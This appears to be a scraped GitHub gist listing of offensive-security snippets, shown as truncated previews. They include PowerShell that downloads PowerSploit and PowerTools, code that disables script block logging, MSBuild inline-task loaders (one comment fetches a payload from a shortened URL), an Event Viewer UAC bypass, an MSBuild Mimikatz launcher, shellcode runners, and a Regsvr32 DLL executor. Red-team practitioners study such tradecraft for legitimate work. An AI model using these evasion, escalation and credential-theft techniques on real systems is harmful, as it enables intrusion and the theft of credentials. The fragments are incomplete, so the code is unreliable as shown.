Remove-Module PowerView -ErrorAction SilentlyContinue
Remove-Module PowerUp -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip"
$file = "$($env:TEMP)\PowerTools.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
Remove-Module PowerSploit -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/mattifestation/PowerSploit/archive/master.zip"
$file = "$($env:TEMP)\PowerSploit.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
davehardy20 / keybase.md
Created June 24, 2017 13:21

Keybase proof

I hereby claim:

  • I am davehardy20 on github.
  • I am davehardy20 (https://keybase.io/davehardy20) on keybase.
  • I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo

To claim this, I am signing this object:

<?xml version="1.0"?>
<command>
<![CDATA[
function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
davehardy20 / msbuilder.xml
Created July 27, 2017 07:19
MSBuild Execute Assembly From Environment Variable
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
<!-- Populate the Env Var like this or many other ways: -->
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of ability to customize the build process -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
davehardy20 / EventVwrBypass.cs
Created July 27, 2017 07:21
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
davehardy20 / katz.xml
Created July 27, 2017 07:24
MSBuild - Mimikatz - Server 2016
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
davehardy20 / PoCPowerShellCoreShellcodeRunner.ps1
Created July 27, 2017 07:24
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>
function Invoke-VirtualAlloc {
Param (
[IntPtr] $lpAddress,
[UInt32] $dwSize,
[UInt32] $flAllocationType,
davehardy20 / evil.cs
Created July 27, 2017 07:41
Execute a DLL via Regsvr32
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
class Test
{
davehardy20 / shellcode.js
Created July 27, 2017 07:56
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js